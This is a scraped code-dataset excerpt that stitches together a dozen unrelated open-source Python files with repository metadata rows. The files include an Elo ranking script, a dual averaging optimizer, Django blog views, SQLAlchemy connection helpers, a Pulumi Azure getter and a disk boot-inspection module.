print("Clustering done after {:.2f} sec".format(time.time() - start_time)) | 39.937063 | 143 | 0.709158 |
4a1f4f3d91982d2ea80d4f5e58037fd0d77bdd1f | 2,571 | py | Python | calculateRanking.py | ConorMaley/Catan | c16f1a1d1eb286b13322a8b50ef319dd079ef01c | [
"Apache-2.0"
] | null | null | null | calculateRanking.py | ConorMaley/Catan | c16f1a1d1eb286b13322a8b50ef319dd079ef01c | [
"Apache-2.0"
] | null | null | null | calculateRanking.py | ConorMaley/Catan | c16f1a1d1eb286b13322a8b50ef319dd079ef01c | [
"Apache-2.0"
] | null | null | null | import googleSheetsApi
import eloCalculator
def main():
masterSheet = googleSheetsApi.getMasterSheet()
Elos = {}
playersArray = []
highestELO = {}
highestELO['score'] = 1200
lowestELO = {}
lowestELO['score'] = 1200
for line_count, row in enumerate(masterSheet):
if line_count == 0:
for name in row[1:]:
Elos[name] = 1200
playersArray.append(name)
# print(f'Column names are {", ".join(row)}')
else:
Gamescore = {}
OldElos = {}
for index, score in enumerate(row[1:]):
if score == '':
score = 0
if int(score) >= 2:
Gamescore[playersArray[index]] = score
OldElos[playersArray[index]] = Elos[playersArray[index]]
for index, (player, score) in enumerate(Gamescore.items()):
scoreChange = 0
for jindex, (opp, oppScore) in enumerate(Gamescore.items()):
if index != jindex:
if int(score) > int(oppScore):
status = 1
elif int(score) == int(oppScore):
status = 0.5
else:
status = 0
# print(f'{status} = status')
# K is constant for now
tempSC = eloCalculator.CalcEloChange(Elos[player], OldElos[opp], 30, status)
# print(f'{player} {Elos[player]} scored {score}, Opponent {opp} {OldElos[opp]} scored {oppScore}, change to player {tempSC}')
scoreChange += tempSC
# print(f'{player} scoreChange = {scoreChange}')
Elos[player] += round(scoreChange, 2)
# print(f'=============ELO after {line_count} games=============')
for name in sorted(Elos, key=Elos.get, reverse=True):
# not very efficient
if Elos[name] > highestELO['score']:
highestELO['score'] = Elos[name]
highestELO['player'] = name
highestELO['game'] = line_count
elif Elos[name] < lowestELO['score']:
lowestELO['score'] = Elos[name]
lowestELO['player'] = name
lowestELO['game'] = line_count
# print(f'{name}: {Elos[name]}')
# print(f'{sorted( ((name, score) for score, name in Elos.items()), reverse=True)}')
# newScore = '{} : {}'.format(name, score) for score, name in Elos.items() }
# print(f'{newScore}')
# print(f'Game {line_count} {repr(Elos.items())}')
#todo: write to rankings in google sheet
# for avg, val in enumerate(Elos):
# avg += Elos[val]
# print(f'{val}: {Elos[val]}')
# avg = avg/len(Elos)
# print(f'Avg Elo: {avg}')
# Final rankings
print('=============Final ELO count=============')
print(f'Highest ELO: {highestELO}')
print(f'Lowest ELO: {lowestELO}')
for name in sorted(Elos, key=Elos.get, reverse=True):
print(f'{name}: {Elos[name]}')
if __name__ == '__main__':
main() | 30.975904 | 132 | 0.614936 |
4a1f50ad03f7a6627765530eb74786a9747d78f0 | 3,564 | py | Python | ndsys/optimizers/da.py | slagosz/ndsys | 9ef9e47a20fdf93fe2ea3f6c3647e373152e8d9f | [
"MIT"
] | null | null | null | ndsys/optimizers/da.py | slagosz/ndsys | 9ef9e47a20fdf93fe2ea3f6c3647e373152e8d9f | [
"MIT"
] | null | null | null | ndsys/optimizers/da.py | slagosz/ndsys | 9ef9e47a20fdf93fe2ea3f6c3647e373152e8d9f | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.base import BaseEstimator
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
class EntropicDualAveraging(BaseEstimator):
"""The variant of the Dual Averaging algorithm based on the negative entropy function
Parameters
----------
l1_constraint : float, default=1.0
Radius of an l1-norm ball.
G : float, default=None
This parameter scales the algorithm's step sizes. If set to None, then it is estimated according to
the following formula: G = (l1_constraint + max(y)) ** 2 (see the documentation).
learning_rate : {'constant', 'online', 'adaptive'}, default='adaptive'
The strategy for choosing the algorithm's step sizes.
"""
def __init__(self, l1_constraint=1.0, G=None, learning_rate='adaptive'):
self.l1_constraint = l1_constraint
self.G = G
self.learning_rate = learning_rate
def _validate_params(self):
assert self.l1_constraint > 0
def _estimate_G(self, y):
return self.l1_constraint * (self.l1_constraint + np.max(y))
@staticmethod
def _map_parameters(parameters, R):
D = int(len(parameters) / 2)
transformed_parameters = np.zeros(D)
for i in range(D):
transformed_parameters[i] = R * (parameters[i] - parameters[i + D])
return transformed_parameters
@staticmethod
def _compute_gradient(x, y, y_hat):
return (y_hat - y) * x
def fit(self, X, y):
"""Fits the model.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
The training input samples.
y : array-like, shape (n_samples,) or (n_samples, n_outputs)
The target values.
Returns
-------
self : object
"""
self._validate_params()
X, y = check_X_y(X, y)
n_samples, self.n_features_in_ = X.shape
D = 2 * self.n_features_in_
if self.G is None:
self.G = self._estimate_G(y)
params_0 = np.ones(D) / D
params_avg = params_0
params = params_0
stepsize = None
gradient_sum = 0
gradient_max_sq_sum = 0
if self.learning_rate == 'constant':
stepsize = self.G * self.l1_constraint / np.sqrt(n_samples)
for i in range(n_samples):
x = np.concatenate([X[i], -X[i]]) * self.l1_constraint
y_hat = np.dot(params, x)
gradient = self._compute_gradient(x, y[i], y_hat)
gradient_sum += gradient
if self.learning_rate == 'online':
stepsize = self.G * self.l1_constraint / np.sqrt(i + 1)
elif self.learning_rate == 'adaptive':
gradient_max_sq_sum += np.max(np.abs(gradient)) ** 2
stepsize = np.sqrt(np.log(D) / gradient_max_sq_sum)
params = np.exp(-stepsize * gradient_sum)
params /= np.linalg.norm(params, 1)
params_avg = (params + params_avg * (i + 1)) / (i + 2)
self.params_ = self._map_parameters(params, self.l1_constraint)
return self
def predict(self, X):
"""Predicts the target value.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
The training input samples.
Returns
-------
y : ndarray, shape (n_samples,)
"""
X = check_array(X)
check_is_fitted(self)
return X @ self.params_
| 29.94958 | 107 | 0.588664 |
4a1f50f11d854ae4eb1a83473396cddecc4f589c | 315 | py | Python | exercises/templatetags/form_widgets.py | rattletat/homework-server | abfac831ed45cc567a6a1610edee934200ffada7 | [
"Unlicense"
] | 1 | 2020-06-03T14:54:38.000Z | 2020-06-03T14:54:38.000Z | exercises/templatetags/form_widgets.py | rattletat/homework-server | abfac831ed45cc567a6a1610edee934200ffada7 | [
"Unlicense"
] | null | null | null | exercises/templatetags/form_widgets.py | rattletat/homework-server | abfac831ed45cc567a6a1610edee934200ffada7 | [
"Unlicense"
] | null | null | null | from django.template import Library
register = Library()
@register.filter
def add_classes(widget, classes):
widget.field.widget.attrs['class'] = classes
return widget
@register.filter
def add_placeholder(widget, placeholder):
widget.field.widget.attrs['placeholder'] = placeholder
return widget
| 21 | 58 | 0.755556 |
4a1f52b30392ebc6491e741567ded1b4be3db371 | 2,529 | py | Python | decision_tree.py | jkleve/Presidential-Prediction | 5a9f7b0d5e954eb7c7f59a3a7f9081257c7f0268 | [
"MIT"
] | null | null | null | decision_tree.py | jkleve/Presidential-Prediction | 5a9f7b0d5e954eb7c7f59a3a7f9081257c7f0268 | [
"MIT"
] | null | null | null | decision_tree.py | jkleve/Presidential-Prediction | 5a9f7b0d5e954eb7c7f59a3a7f9081257c7f0268 | [
"MIT"
] | null | null | null | from sklearn.naive_bayes import GaussianNB
from sklearn import tree
import numpy as np
import matplotlib.pyplot as plt
import sys
def read_data(file_name, n_features, n_samples):
n = n_features
m = n_samples
y = np.zeros(shape=(m,1))
arr = np.zeros(shape=(m,n))
i = 0
with open(file_name) as f:
for l in f:
data = [int(d.rstrip()) for d in l.split(',')]
arr[i] = data[0:n]
y[i] = data[n]
i += 1
return arr, y
def get_train_set(arr, i):
beginning = arr[0:i]
end = arr[i+1:]
if len(beginning) > 0:
if len(end) > 0:
return (np.concatenate((beginning,end)))
else:
return beginning
else:
return end
def gen_2d_feature_set(f1, f2):
return np.column_stack((f1,f2))
def run_test(x, y, num_samples, num_features):
num_correct = 0
for i in range(0,num_samples):
testx = x[i]
testy = y[i]
trainx = get_train_set(x, i)
trainy = get_train_set(y, i)
X = trainx.reshape(-1,num_features)
Y = trainy.reshape(1,-1)[0]
clf_tree = tree.DecisionTreeClassifier()
clf_tree.fit(X,Y)
guess = clf_tree.predict([testx])
#clf = GaussianNB()
#clf.fit(X,Y)
#print(clf.get_params())
#guess = clf.predict([testx])
if testy == guess: num_correct += 1
#print("Testing with %d: NB guess %d, actual %d" % (i+1, guess[0], testy))
return (num_correct/36.0)
def print_results(d):
import operator
output = sorted(d.items(), key=operator.itemgetter(1), reverse=True)
print(output)
if __name__ == "__main__":
num_features = 1
num_samples = 50
features, y = read_data('data.txt', num_features, num_samples)
print(y)
sys.exit()
#num_samples = features.shape[0]
tests = {}
# go through each feature
for i in range(0, num_features):
x = None
test_name = ""
num_f = 0
# if i == j lets just test that one feature
if i == j:
x = features[:,i]
num_f = 1
test_name = "%d" % (i+1)
else:
x = gen_2d_feature_set(features[:,i], features[:,j])
num_f = 2
test_name = "%d,%d" % (i+1,j+1)
accuracy = run_test(x, y, num_samples, num_f)
tests[test_name] = accuracy
#print("%d,%d: %f" % (i,j,accuracy))
print_results(tests)
sys.exit()
#plt.plot(x5,y,'ro')
#plt.show()
#sys.exit()
| 25.039604 | 82 | 0.552392 |
4a1f5304f5072466944a11d8ea6e7bc783fb29a8 | 5,289 | py | Python | dbutils.py | workforce-data-initiative/etp-warehouse | 5713a9a196d48954023bc97cb79c929e637810e8 | [
"Apache-2.0"
] | null | null | null | dbutils.py | workforce-data-initiative/etp-warehouse | 5713a9a196d48954023bc97cb79c929e637810e8 | [
"Apache-2.0"
] | null | null | null | dbutils.py | workforce-data-initiative/etp-warehouse | 5713a9a196d48954023bc97cb79c929e637810e8 | [
"Apache-2.0"
] | null | null | null | import logging
import yaml
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, Session
logger = logging.getLogger(__name__)
class DbConfValidator(object):
@staticmethod
def validate_conf(db_conf):
pass
class DbConnectionUri(object):
@classmethod
def build_conn_uri(cls, db_conf):
pass
class SqliteDbConfValidator(DbConfValidator):
@staticmethod
def validate_conf(db_conf):
"""
Validate SQLite database connection parameters
:param db_conf: dict of connection parameters
:return: dict of validate connection parameters
"""
logger.info("Validating database connection configs")
if db_conf is None:
raise ValueError("Database connection configs required")
return db_conf
class PsqlDbConfValidator(DbConfValidator):
@staticmethod
def validate_conf(db_conf):
"""
Validate PostgreSQL database connection parameters
:param db_conf: dict of connection parameters
:return: dict of validate connection parameters
"""
logger.info("Validating database connection configs")
if db_conf is None:
raise ValueError("Database connection configs required")
return db_conf
class SqliteDbConnectionUri(DbConnectionUri):
db_adapter = "sqlite"
conn_uri = "{db_adapter}:///{db_path}"
@classmethod
def build_conn_uri(cls, db_conf):
"""
Create database connection uri for SQLite
:param db_conf: dict of connection parameters
:return: valid connection string for database built
from parameters passed in db_conf
"""
db_conf = SqliteDbConfValidator.validate_conf(db_conf)
return cls.conn_uri.format(db_adapter=cls.db_adapter, db_path=db_conf['database'])
class PsqlDbConnectionUri(DbConnectionUri):
db_adapter = "postgresql"
conn_uri = "{db_adapter}://{username}:{password}@{host}:{port}/{database}"
@classmethod
def build_conn_uri(cls, db_conf):
"""
Create database connection uri for PostgreSQL
:param db_conf: dict of connection parameters
:return: valid connection string for database built
from parameters passed in db_conf
"""
db_conf = PsqlDbConfValidator.validate_conf(db_conf)
return cls.conn_uri.format(db_adapter=cls.db_adapter, username=db_conf['username'],
password=db_conf['password'], host=db_conf['host'],
port=db_conf['port'], database=db_conf['database'])
class DbConnection(object):
Session = sessionmaker()
def __init__(self, conn_uri):
self.engine = create_engine(conn_uri)
def start_session(self):
"""
Start database connection session
:return: new session object bound to instance engine created from
connection string passed on DbConnection object creation
"""
logger.info("Starting database connection session")
self.Session.configure(bind=self.engine)
return Session()
# selector for supported database connections
db_uris = {'sqlite': SqliteDbConnectionUri().__class__,
'postgresql': PsqlDbConnectionUri().__class__}
def read_dbconf(conf_file, db_adapter, schema_name):
"""
Read (yaml format) database configuration file
:param conf_file: YAML file containing database connection params
:param db_adapter: Database adapter name
:param schema_name: 'schema' used loosely here to indicate which
database is being accessed, [transactional | warehouse]
:raises: TypeError, when conf_file or db_adapter passed is None
FileNotFoundError if conf_file is not found or yaml.YAMLError
if conf_file yaml is not read
:return: dict of database conf for the specified db_adapter
"""
try:
with open(conf_file, 'r') as yml_conf:
conf = yaml.load(yml_conf)
except(TypeError, FileNotFoundError, yaml.YAMLError) as err:
logger.debug(err)
raise
return conf.get(db_adapter).get(schema_name)
def conn_uri_factory(conf_file, db_adapter, schema_name):
"""
Create the applicable connection uri for the database adapter
passed using parameters read from config file
:param conf_file: YAML file containing database connection params
used by SQLAlchemy to create connection. Supported
fields include SQLAlchemy database adapter name, host
port, username, password, database
:param db_adapter: Database adapter name as accepted by SQLAlchemy
:param schema_name: 'schema' used loosely here to indicate which
database is being accessed, [transactional | warehouse]
:return: SQLAlchemy connection uri for the database with specified adapter
"""
try:
db_conf = read_dbconf(conf_file, db_adapter, schema_name)
except Exception as err:
logger.debug(err)
raise
# dynamically select connection uri class
UriClass = db_uris.get(db_adapter)
return UriClass().build_conn_uri(db_conf)
# db inspector
| 29.220994 | 91 | 0.673284 |
4a1f534f96b10e15980d6e7db7bf87318539cd6b | 748 | py | Python | spid_cie_oidc/entity/migrations/0013_alter_federationentityconfiguration_metadata.py | peppelinux/spid-cie-oidc-authority | 816636fece10f410f5d6fce85fd79bb409d0c8b8 | [
"Apache-2.0"
] | 4 | 2022-03-08T09:05:13.000Z | 2022-03-16T17:59:43.000Z | spid_cie_oidc/entity/migrations/0013_alter_federationentityconfiguration_metadata.py | peppelinux/spid-cie-oidc-authority | 816636fece10f410f5d6fce85fd79bb409d0c8b8 | [
"Apache-2.0"
] | 64 | 2022-03-08T01:11:40.000Z | 2022-03-31T17:23:49.000Z | spid_cie_oidc/entity/migrations/0013_alter_federationentityconfiguration_metadata.py | peppelinux/spid-cie-oidc-authority | 816636fece10f410f5d6fce85fd79bb409d0c8b8 | [
"Apache-2.0"
] | 8 | 2022-03-09T12:00:08.000Z | 2022-03-31T13:52:14.000Z | # Generated by Django 4.0.2 on 2022-03-13 00:41
from django.db import migrations, models
import spid_cie_oidc.entity.validators
class Migration(migrations.Migration):
dependencies = [
('spid_cie_oidc_entity', '0012_delete_publicjwk'),
]
operations = [
migrations.AlterField(
model_name='federationentityconfiguration',
name='metadata',
field=models.JSONField(default=dict, help_text='federation_entity metadata, eg: {"federation_entity": { ... },"openid_provider": { ... },"openid_relying_party": { ... },"oauth_resource": { ... }}', validators=[spid_cie_oidc.entity.validators.validate_entity_metadata, spid_cie_oidc.entity.validators.validate_metadata_algs]),
),
]
| 37.4 | 337 | 0.691176 |
4a1f54728b6dcf3d211418f777de5ccfe734f29d | 605 | py | Python | models/backbone/__init__.py | shiyutang/CAG_UDA | c3eda799e2edbd2dd0b6ab6bd8b12727167c9c91 | [
"MIT"
] | 126 | 2019-10-30T00:58:02.000Z | 2022-01-26T06:29:10.000Z | models/backbone/__init__.py | shiyutang/CAG_UDA | c3eda799e2edbd2dd0b6ab6bd8b12727167c9c91 | [
"MIT"
] | 14 | 2019-11-05T15:10:22.000Z | 2022-02-08T09:05:53.000Z | models/backbone/__init__.py | shiyutang/CAG_UDA | c3eda799e2edbd2dd0b6ab6bd8b12727167c9c91 | [
"MIT"
] | 26 | 2019-12-02T09:41:11.000Z | 2022-01-29T10:46:41.000Z | from models.backbone import resnet, xception, drn, mobilenet
def build_backbone(backbone, output_stride, BatchNorm):
if backbone == 'resnet101':
return resnet.ResNet101(output_stride, BatchNorm)
elif backbone == 'resnet50':
return resnet.ResNet50(output_stride, BatchNorm)
elif backbone == 'xception':
return xception.AlignedXception(output_stride, BatchNorm)
elif backbone == 'drn':
return drn.drn_d_54(BatchNorm)
elif backbone == 'mobilenet':
return mobilenet.MobileNetV2(output_stride, BatchNorm)
else:
raise NotImplementedError
| 37.8125 | 65 | 0.710744 |
4a1f54d0c77258b6365a847d7323882a8f25a8a5 | 560 | py | Python | planemo/commands/cmd_profile_list.py | gmauro/planemo | 574088f356a7b9f49191daf15437c2973c7318d8 | [
"CC-BY-3.0"
] | 73 | 2015-01-03T15:09:26.000Z | 2022-03-30T23:52:55.000Z | planemo/commands/cmd_profile_list.py | gmauro/planemo | 574088f356a7b9f49191daf15437c2973c7318d8 | [
"CC-BY-3.0"
] | 958 | 2015-01-02T08:27:45.000Z | 2022-03-23T14:51:51.000Z | planemo/commands/cmd_profile_list.py | gmauro/planemo | 574088f356a7b9f49191daf15437c2973c7318d8 | [
"CC-BY-3.0"
] | 84 | 2015-01-06T18:27:28.000Z | 2021-11-18T01:58:17.000Z | """Module describing the planemo ``profile_list`` command."""
from __future__ import print_function
import click
from planemo.cli import command_function
from planemo.galaxy import profiles
from planemo.io import info
@click.command('profile_list')
@command_function
def cli(ctx, **kwds):
"""List configured profile names."""
info("Looking for profiles...")
profile_names = profiles.list_profiles(ctx, **kwds)
for profile in profile_names:
print(profile)
info("{} configured profiles are available.".format(len(profile_names)))
| 28 | 76 | 0.741071 |
4a1f551e0b3c0ca2cf54b07c3a71b3d713327da7 | 5,175 | py | Python | sdk/python/pulumi_azure_native/recoveryservices/v20200202/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/recoveryservices/v20200202/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/recoveryservices/v20200202/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
"""
Private Endpoint Connection Response Properties
"""
def __init__(__self__, e_tag=None, id=None, location=None, name=None, properties=None, tags=None, type=None):
if e_tag and not isinstance(e_tag, str):
raise TypeError("Expected argument 'e_tag' to be a str")
pulumi.set(__self__, "e_tag", e_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="eTag")
def e_tag(self) -> Optional[str]:
"""
Optional ETag.
"""
return pulumi.get(self, "e_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id represents the complete path to the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name associated with the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.PrivateEndpointConnectionResponse':
"""
PrivateEndpointConnectionResource properties
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type represents the complete path of the form Namespace/ResourceType/ResourceType/...
"""
return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateEndpointConnectionResult(
e_tag=self.e_tag,
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_private_endpoint_connection(private_endpoint_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
vault_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
"""
Private Endpoint Connection Response Properties
:param str private_endpoint_connection_name: The name of the private endpoint connection.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
__args__ = dict()
__args__['privateEndpointConnectionName'] = private_endpoint_connection_name
__args__['resourceGroupName'] = resource_group_name
__args__['vaultName'] = vault_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:recoveryservices/v20200202:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
return AwaitableGetPrivateEndpointConnectionResult(
e_tag=__ret__.e_tag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
| 34.966216 | 174 | 0.644831 |
4a1f5661c5688b7b0d9e4bc5f271f4d305d3ed43 | 2,081 | py | Python | blog/views.py | JochenFM/art_prints_ms4 | 61fd8a06aa398ac97ce32ac9627d3ece113af85f | [
"PostgreSQL"
] | null | null | null | blog/views.py | JochenFM/art_prints_ms4 | 61fd8a06aa398ac97ce32ac9627d3ece113af85f | [
"PostgreSQL"
] | null | null | null | blog/views.py | JochenFM/art_prints_ms4 | 61fd8a06aa398ac97ce32ac9627d3ece113af85f | [
"PostgreSQL"
] | 1 | 2021-09-02T09:48:19.000Z | 2021-09-02T09:48:19.000Z | from django.shortcuts import render, get_object_or_404
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.models import User
from django.views.generic import (
ListView,
DetailView,
CreateView,
UpdateView,
DeleteView
)
from .models import Post
# Create your views here.
def blog(request):
context = {
'posts': Post.objects.all()
}
return render(request, 'blog/blog.html', context)
class PostListView(ListView):
model = Post
template_name = 'blog/blog.html' # name convention is <app>/<model>_<viewtype>.html
context_object_name = 'posts'
ordering = ['-date_posted']
paginate_by = 4
# to filter and display posts created by a certain user
class UserPostListView(ListView):
model = Post
template_name = 'blog/user_posts.html'
context_object_name = 'posts'
paginate_by = 2
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return Post.objects.filter(author=user).order_by('-date_posted')
class PostDetailView(DetailView):
model = Post
class PostCreateView(LoginRequiredMixin, CreateView):
model = Post
fields = ['title', 'content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PostUpdateView(UpdateView):
model = Post
fields = ['title', 'content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
"""test function to check whether current logged in user = author of post"""
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
success_url = '/blog/'
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
| 25.072289 | 88 | 0.677559 |
4a1f5751fbd4d6b44d99c69a74ad89a8496f8648 | 1,792 | py | Python | sympy/codegen/futils.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 8,323 | 2015-01-02T15:51:43.000Z | 2022-03-31T13:13:19.000Z | sympy/codegen/futils.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 15,102 | 2015-01-01T01:33:17.000Z | 2022-03-31T22:53:13.000Z | sympy/codegen/futils.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 4,490 | 2015-01-01T17:48:07.000Z | 2022-03-31T17:24:05.000Z | from itertools import chain
from sympy.codegen.fnodes import Module
from sympy.core.symbol import Dummy
from sympy.printing.fortran import FCodePrinter
""" This module collects utilities for rendering Fortran code. """
def render_as_module(definitions, name, declarations=(), printer_settings=None):
""" Creates a ``Module`` instance and renders it as a string.
This generates Fortran source code for a module with the correct ``use`` statements.
Parameters
==========
definitions : iterable
Passed to :class:`sympy.codegen.fnodes.Module`.
name : str
Passed to :class:`sympy.codegen.fnodes.Module`.
declarations : iterable
Passed to :class:`sympy.codegen.fnodes.Module`. It will be extended with
use statements, 'implicit none' and public list generated from ``definitions``.
printer_settings : dict
Passed to ``FCodePrinter`` (default: ``{'standard': 2003, 'source_format': 'free'}``).
"""
printer_settings = printer_settings or {'standard': 2003, 'source_format': 'free'}
printer = FCodePrinter(printer_settings)
dummy = Dummy()
if isinstance(definitions, Module):
raise ValueError("This function expects to construct a module on its own.")
mod = Module(name, chain(declarations, [dummy]), definitions)
fstr = printer.doprint(mod)
module_use_str = ' %s\n' % ' \n'.join(['use %s, only: %s' % (k, ', '.join(v)) for
k, v in printer.module_uses.items()])
module_use_str += ' implicit none\n'
module_use_str += ' private\n'
module_use_str += ' public %s\n' % ', '.join([str(node.name) for node in definitions if getattr(node, 'name', None)])
return fstr.replace(printer.doprint(dummy), module_use_str)
| 43.707317 | 123 | 0.662946 |
4a1f578dda292e6f1e9a5dfa6289089a5e76466e | 6,902 | py | Python | daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py | a-zakem/compute-image-tools | 28138fd8e1a6c245125b744a7d912720d7239b2c | [
"Apache-2.0"
] | 1 | 2020-06-04T20:31:26.000Z | 2020-06-04T20:31:26.000Z | daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py | a-zakem/compute-image-tools | 28138fd8e1a6c245125b744a7d912720d7239b2c | [
"Apache-2.0"
] | 1 | 2021-08-18T19:00:35.000Z | 2021-08-18T19:00:35.000Z | daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py | a-zakem/compute-image-tools | 28138fd8e1a6c245125b744a7d912720d7239b2c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Finds boot-related properties of disks.
This module supports offline inspection of block devices and
virtual disk files, with a focus on information that typically
requires booting the system.
See `model.InspectionResults` for which information is returned.
In terms of OS support, this module focuses on systems
that are runnable on Google Compute Engine, with a particular focus on the
systems that are importable to Google Compute Engine:
https://cloud.google.com/compute/docs/import
In other words, it doesn't seek to exhaustively detect all systems,
and will remove support for defunct systems over time.
"""
import os
import re
import sys
from boot_inspect.inspectors.os import architecture, linux, windows
import boot_inspect.system.filesystems
from compute_image_tools_proto import inspect_pb2
_LINUX = [
linux.Fingerprint(inspect_pb2.Distro.AMAZON,
aliases=['amzn', 'amazonlinux']),
linux.Fingerprint(
inspect_pb2.Distro.CENTOS,
fs_predicate=linux.FileExistenceMatcher(
require={'/etc/centos-release'},
disallow={'/etc/fedora-release',
'/etc/oracle-release'}),
version_reader=linux.VersionReader(
metadata_file='/etc/centos-release',
version_pattern=re.compile(r'\d+\.\d+')),
),
linux.Fingerprint(
inspect_pb2.Distro.DEBIAN,
version_reader=linux.VersionReader(
metadata_file='/etc/debian_version',
version_pattern=re.compile(r'\d+\.\d+'),
),
),
linux.Fingerprint(inspect_pb2.Distro.FEDORA),
linux.Fingerprint(inspect_pb2.Distro.KALI),
linux.Fingerprint(
inspect_pb2.Distro.RHEL,
fs_predicate=linux.FileExistenceMatcher(
require={'/etc/redhat-release'},
disallow={'/etc/fedora-release',
'/etc/oracle-release',
'/etc/centos-release'}),
version_reader=linux.VersionReader(
metadata_file='/etc/redhat-release',
version_pattern=re.compile(r'\d+\.\d+')),
),
# Depending on the version, SLES for SAP has a variety of identifiers in
# /etc/os-release. To match, one of those identifiers must be seen
# *and* the file /etc/products.d/SLES_SAP.prod must exist.
#
# This is documented here:
# https://www.suse.com/support/kb/doc/?id=000019341
linux.Fingerprint(
inspect_pb2.Distro.SLES_SAP,
aliases=['sles', 'sles_sap'],
fs_predicate=linux.FileExistenceMatcher(
require={'/etc/products.d/SLES_SAP.prod'})
),
linux.Fingerprint(inspect_pb2.Distro.SLES),
linux.Fingerprint(inspect_pb2.Distro.OPENSUSE, aliases=['opensuse-leap']),
linux.Fingerprint(inspect_pb2.Distro.ORACLE,
aliases=['ol', 'oraclelinux']),
linux.Fingerprint(inspect_pb2.Distro.UBUNTU),
]
def inspect_device(g) -> inspect_pb2.InspectionResults:
"""Finds boot-related properties for a device using offline inspection.
Args:
g (guestfs.GuestFS): A launched, but unmounted, GuestFS instance.
Example:
g = guestfs.GuestFS(python_return_dict=True)
g.add_drive_opts("/dev/sdb", format="raw")
g.launch()
results = inspect_device(g, "/dev/sdb")
"""
roots = g.inspect_os()
if len(roots) == 0:
return inspect_pb2.InspectionResults(
os_count=len(roots)
)
root = roots[0]
mount_points = g.inspect_get_mountpoints(root)
for dev, mp in sorted(mount_points.items(), key=lambda k: len(k[0])):
try:
g.mount_ro(mp, dev)
except RuntimeError as msg:
print('%s (ignored)' % msg, file=sys.stderr)
